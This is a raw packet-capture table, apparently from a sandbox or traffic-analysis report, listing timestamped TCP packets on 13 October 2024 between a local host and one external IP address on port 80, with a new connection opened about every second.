Oct 13, 2024 17:02:39.118015051 CEST	80	49741	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:39.118139982 CEST	49741	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:39.118288040 CEST	49741	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:39.118324041 CEST	49741	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:39.123888016 CEST	80	49741	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:39.124034882 CEST	80	49741	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:40.314954042 CEST	80	49741	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:40.315179110 CEST	80	49741	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:40.315350056 CEST	49741	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:40.315351009 CEST	49741	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:40.318582058 CEST	49742	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:40.320806980 CEST	80	49741	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:40.323703051 CEST	80	49742	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:40.323776960 CEST	49742	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:40.323925018 CEST	49742	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:40.323961020 CEST	49742	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:40.329161882 CEST	80	49742	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:40.329277992 CEST	80	49742	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:41.718607903 CEST	80	49742	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:41.719450951 CEST	80	49742	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:41.719961882 CEST	49742	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:41.719961882 CEST	49742	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:41.723174095 CEST	49743	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:41.725390911 CEST	80	49742	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:41.728741884 CEST	80	49743	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:41.729180098 CEST	49743	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:41.729180098 CEST	49743	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:41.729296923 CEST	49743	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:41.734564066 CEST	80	49743	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:41.734639883 CEST	80	49743	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:43.127505064 CEST	80	49743	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:43.127526999 CEST	80	49743	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:43.127589941 CEST	49743	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:43.127773046 CEST	49743	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:43.132734060 CEST	80	49743	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:43.186113119 CEST	49744	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:43.191576958 CEST	80	49744	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:43.191756964 CEST	49744	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:43.191849947 CEST	49744	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:43.191849947 CEST	49744	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:43.197463036 CEST	80	49744	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:43.197654009 CEST	80	49744	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:44.418507099 CEST	80	49744	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:44.418549061 CEST	80	49744	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:44.418920040 CEST	49744	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:44.419318914 CEST	49744	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:44.422872066 CEST	49745	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:44.425367117 CEST	80	49744	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:44.428920984 CEST	80	49745	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:44.429007053 CEST	49745	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:44.429153919 CEST	49745	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:44.429188013 CEST	49745	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:44.434396029 CEST	80	49745	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:44.434411049 CEST	80	49745	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:45.651444912 CEST	80	49745	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:45.651973963 CEST	80	49745	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:45.652054071 CEST	49745	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:45.652141094 CEST	49745	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:45.655184984 CEST	49746	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:45.658524990 CEST	80	49745	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:45.661622047 CEST	80	49746	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:45.661698103 CEST	49746	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:45.661859989 CEST	49746	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:45.661891937 CEST	49746	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:45.669509888 CEST	80	49746	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:45.669542074 CEST	80	49746	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:46.864932060 CEST	80	49746	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:46.865941048 CEST	80	49746	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:46.866023064 CEST	49746	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:46.866106033 CEST	49746	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:46.871300936 CEST	80	49746	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:46.873111010 CEST	49747	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:46.881781101 CEST	80	49747	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:46.882241964 CEST	49747	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:46.882323980 CEST	49747	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:46.882323980 CEST	49747	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:46.888642073 CEST	80	49747	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:46.888659954 CEST	80	49747	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:48.087645054 CEST	80	49747	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:48.088360071 CEST	80	49747	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:48.088815928 CEST	49747	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:48.088815928 CEST	49747	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:48.092044115 CEST	49748	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:48.094264984 CEST	80	49747	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:48.097707033 CEST	80	49748	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:48.098006964 CEST	49748	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:48.098006964 CEST	49748	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:48.098058939 CEST	49748	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:48.104764938 CEST	80	49748	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:48.105384111 CEST	80	49748	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:49.323573112 CEST	80	49748	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:49.323952913 CEST	80	49748	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:49.324243069 CEST	49748	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:49.346019030 CEST	49748	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:49.351309061 CEST	80	49748	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:49.375056982 CEST	49749	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:49.380335093 CEST	80	49749	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:49.380414009 CEST	49749	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:49.380553007 CEST	49749	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:49.380609989 CEST	49749	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:49.385657072 CEST	80	49749	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:49.386015892 CEST	80	49749	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:50.630939007 CEST	80	49749	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:50.631422997 CEST	80	49749	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:50.631889105 CEST	49749	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:50.631889105 CEST	49749	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:50.634012938 CEST	49750	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:50.637607098 CEST	80	49749	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:50.639192104 CEST	80	49750	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:50.639411926 CEST	49750	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:50.639411926 CEST	49750	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:50.639473915 CEST	49750	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:50.645639896 CEST	80	49750	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:50.645669937 CEST	80	49750	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:51.846788883 CEST	80	49750	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:51.847420931 CEST	80	49750	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:51.847825050 CEST	49750	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:51.847825050 CEST	49750	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:51.850218058 CEST	49751	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:51.854507923 CEST	80	49750	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:51.856842995 CEST	80	49751	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:51.857181072 CEST	49751	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:51.857182026 CEST	49751	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:51.857182026 CEST	49751	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:51.862633944 CEST	80	49751	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:51.863471031 CEST	80	49751	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:53.051822901 CEST	80	49751	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:53.052421093 CEST	80	49751	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:53.053024054 CEST	49751	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:53.053025007 CEST	49751	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:53.055464983 CEST	49752	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:53.058257103 CEST	80	49751	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:53.060580015 CEST	80	49752	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:53.060666084 CEST	49752	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:53.060765028 CEST	49752	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:53.060798883 CEST	49752	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:53.066361904 CEST	80	49752	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:53.066495895 CEST	80	49752	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:54.269166946 CEST	80	49752	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:54.269788027 CEST	80	49752	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:54.269861937 CEST	49752	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:54.269948959 CEST	49752	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:54.272766113 CEST	49753	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:54.274966002 CEST	80	49752	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:54.277679920 CEST	80	49753	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:54.277864933 CEST	49753	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:54.277864933 CEST	49753	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:54.277901888 CEST	49753	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:54.283622980 CEST	80	49753	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:54.283652067 CEST	80	49753	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:55.482976913 CEST	80	49753	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:55.483025074 CEST	80	49753	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:55.483123064 CEST	49753	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:55.483405113 CEST	49753	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:55.485366106 CEST	49754	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:55.488517046 CEST	80	49753	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:55.490384102 CEST	80	49754	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:55.490564108 CEST	49754	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:55.490760088 CEST	49754	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:55.490760088 CEST	49754	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:55.496150017 CEST	80	49754	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:55.496180058 CEST	80	49754	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:56.675520897 CEST	80	49754	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:56.676352978 CEST	80	49754	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:56.676549911 CEST	49754	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:56.676736116 CEST	49754	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:56.678881884 CEST	49756	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:56.681668997 CEST	80	49754	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:56.683911085 CEST	80	49756	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:56.684150934 CEST	49756	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:56.685101032 CEST	49756	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:56.685101986 CEST	49756	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:56.690201044 CEST	80	49756	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:56.690336943 CEST	80	49756	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:58.136038065 CEST	80	49756	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:58.136357069 CEST	80	49756	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:58.136557102 CEST	49756	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:58.136557102 CEST	49756	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:58.139544010 CEST	49768	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:58.141746998 CEST	80	49756	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:58.144614935 CEST	80	49768	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:58.144685030 CEST	49768	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:58.144890070 CEST	49768	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:58.144921064 CEST	49768	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:58.150405884 CEST	80	49768	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:58.150455952 CEST	80	49768	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:59.375215054 CEST	80	49768	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:59.375377893 CEST	80	49768	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:59.375454903 CEST	49768	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:59.375540018 CEST	49768	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:59.380435944 CEST	49774	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:59.380543947 CEST	80	49768	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:59.385458946 CEST	80	49774	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:59.385545969 CEST	49774	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:59.385839939 CEST	49774	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:59.385839939 CEST	49774	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:02:59.391459942 CEST	80	49774	78.89.199.216	192.168.2.4
Oct 13, 2024 17:02:59.391557932 CEST	80	49774	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:00.567207098 CEST	80	49774	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:00.567296982 CEST	80	49774	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:00.567671061 CEST	49774	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:00.567759991 CEST	49774	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:00.570714951 CEST	49785	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:00.573648930 CEST	80	49774	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:00.576198101 CEST	80	49785	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:00.580315113 CEST	49785	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:00.580315113 CEST	49785	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:00.583970070 CEST	49785	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:00.586055994 CEST	80	49785	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:00.589783907 CEST	80	49785	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:01.794980049 CEST	80	49785	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:01.795494080 CEST	80	49785	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:01.795567036 CEST	49785	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:01.795660973 CEST	49785	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:01.800889015 CEST	80	49785	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:01.815253019 CEST	49794	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:01.820312023 CEST	80	49794	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:01.820386887 CEST	49794	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:01.839550972 CEST	49794	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:01.839601040 CEST	49794	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:01.844669104 CEST	80	49794	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:01.844700098 CEST	80	49794	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:03.054527998 CEST	80	49794	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:03.055840015 CEST	80	49794	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:03.055927992 CEST	49794	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:03.056003094 CEST	49794	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:03.058851957 CEST	49802	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:03.062767982 CEST	80	49794	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:03.064526081 CEST	80	49802	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:03.064608097 CEST	49802	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:03.064747095 CEST	49802	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:03.064793110 CEST	49802	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:03.070024014 CEST	80	49802	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:03.070051908 CEST	80	49802	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:04.301119089 CEST	80	49802	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:04.301798105 CEST	80	49802	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:04.302004099 CEST	49802	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:04.302005053 CEST	49802	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:04.304913998 CEST	49810	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:04.308376074 CEST	80	49802	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:04.311651945 CEST	80	49810	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:04.311893940 CEST	49810	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:04.311893940 CEST	49810	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:04.311893940 CEST	49810	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:04.317286968 CEST	80	49810	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:04.317437887 CEST	80	49810	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:05.654290915 CEST	80	49810	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:05.654663086 CEST	80	49810	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:05.654853106 CEST	49810	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:05.655349970 CEST	49810	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:05.657824993 CEST	49819	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:05.660471916 CEST	80	49810	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:05.663247108 CEST	80	49819	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:05.663341999 CEST	49819	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:05.663530111 CEST	49819	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:05.663530111 CEST	49819	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:05.668842077 CEST	80	49819	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:05.668947935 CEST	80	49819	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:06.907557964 CEST	80	49819	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:06.907571077 CEST	80	49819	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:06.907799959 CEST	49819	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:06.907800913 CEST	49819	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:06.914355040 CEST	80	49819	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:07.007589102 CEST	49828	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:07.016840935 CEST	80	49828	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:07.017020941 CEST	49828	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:07.017113924 CEST	49828	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:07.017113924 CEST	49828	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:07.025096893 CEST	80	49828	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:07.025106907 CEST	80	49828	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:08.189560890 CEST	80	49828	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:08.190237999 CEST	80	49828	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:08.190298080 CEST	49828	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:08.190323114 CEST	49828	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:08.193116903 CEST	49836	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:08.195164919 CEST	80	49828	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:08.197978020 CEST	80	49836	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:08.198158026 CEST	49836	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:08.198231936 CEST	49836	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:08.198271036 CEST	49836	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:08.203502893 CEST	80	49836	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:08.203511953 CEST	80	49836	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:09.445173025 CEST	80	49836	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:09.445723057 CEST	80	49836	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:09.445903063 CEST	49836	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:09.445947886 CEST	49836	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:09.448765993 CEST	49845	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:09.450809002 CEST	80	49836	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:09.453763962 CEST	80	49845	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:09.453846931 CEST	49845	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:09.453996897 CEST	49845	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:09.454029083 CEST	49845	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:09.459274054 CEST	80	49845	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:09.459302902 CEST	80	49845	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:10.849014997 CEST	80	49845	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:10.849464893 CEST	80	49845	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:10.849623919 CEST	49845	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:10.849623919 CEST	49845	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:10.854516029 CEST	80	49845	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:10.908196926 CEST	49856	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:10.913525105 CEST	80	49856	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:10.913723946 CEST	49856	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:10.913814068 CEST	49856	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:10.913814068 CEST	49856	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:10.919189930 CEST	80	49856	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:10.919346094 CEST	80	49856	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:12.156563044 CEST	80	49856	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:12.157402992 CEST	80	49856	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:12.157474041 CEST	49856	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:12.157555103 CEST	49856	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:12.159852982 CEST	49864	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:12.163930893 CEST	80	49856	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:12.166126013 CEST	80	49864	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:12.166194916 CEST	49864	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:12.166707039 CEST	49864	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:12.166743994 CEST	49864	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:12.173557043 CEST	80	49864	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:12.173567057 CEST	80	49864	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:13.541337967 CEST	80	49864	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:13.543642044 CEST	80	49864	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:13.543698072 CEST	49864	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:13.543751955 CEST	49864	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:13.546578884 CEST	49873	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:13.549077034 CEST	80	49864	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:13.552542925 CEST	80	49873	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:13.552614927 CEST	49873	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:13.552712917 CEST	49873	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:13.552731037 CEST	49873	80	192.168.2.4	78.89.199.216
Oct 13, 2024 17:03:13.558378935 CEST	80	49873	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:13.559869051 CEST	80	49873	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:14.796607971 CEST	80	49873	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:14.797261953 CEST	80	49873	78.89.199.216	192.168.2.4
Oct 13, 2024 17:03:14.797727108 CEST	49873	80	192.168.2.4	78.89.199.216
